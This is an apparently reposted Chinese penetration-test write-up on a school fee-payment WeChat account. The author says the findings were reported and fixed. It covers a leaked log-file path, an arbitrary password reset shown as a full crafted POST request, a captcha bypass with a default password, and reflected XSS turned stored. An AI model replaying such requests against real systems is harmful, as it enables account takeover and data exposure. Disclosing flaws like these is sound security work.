查看原文
其他

对自己学校公众号的一次渗透

李白你好 2023-06-22

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好设为星标”,否则可能就看不到了啦!

0x01 前言

这学期开学交学费的时候,学校开了一个公众号让我们去缴费,随手测试已提交并修复,水文一篇记录一下。

0x02 信息泄露

一些支付的订单和数据库的信息

xxxxxxxxx.com/wx/log/log.log

0x03 任意密码重置

通过忘记密码的页面

xxxxxxxx.com/toForgetSscret

查看源代码可以看到重置密码的数据包构造


构造数据包,来重置20xxxxxxxxxx的密码

POST /updateP HTTP/1.1Host: xxxxxxxx.comContent-Length: 41Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
{"newp":"xX123456","yhbh":"20xxxxxxxxxx"}

发包成功重置

0x04 验证码绕过

虽然不痛不痒但是提一嘴,前端校验数据包内没有验证码字段,默认密码000000,或者重置密码后可以用随机openid来绑定这些账号让他们原主人绑定不上去也算危害


0x05 XSS

反射XSS

在登入页面的显示头像的参数上过滤不严导出xss


存储XSS

通过存在反射xss的链接去绑定他会存储头像,绑定成功后来到首页就弹窗转换为存储xss

查看源代码

0x06 链接获取

文章来源:Juneha

原文链接:https://blog.mo60.cn/index.php/archives/276.html

0x06 往期精彩

一次精彩又完整的内网渗透

FRP通过Socks5二层代理,访问内网三层网站


您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存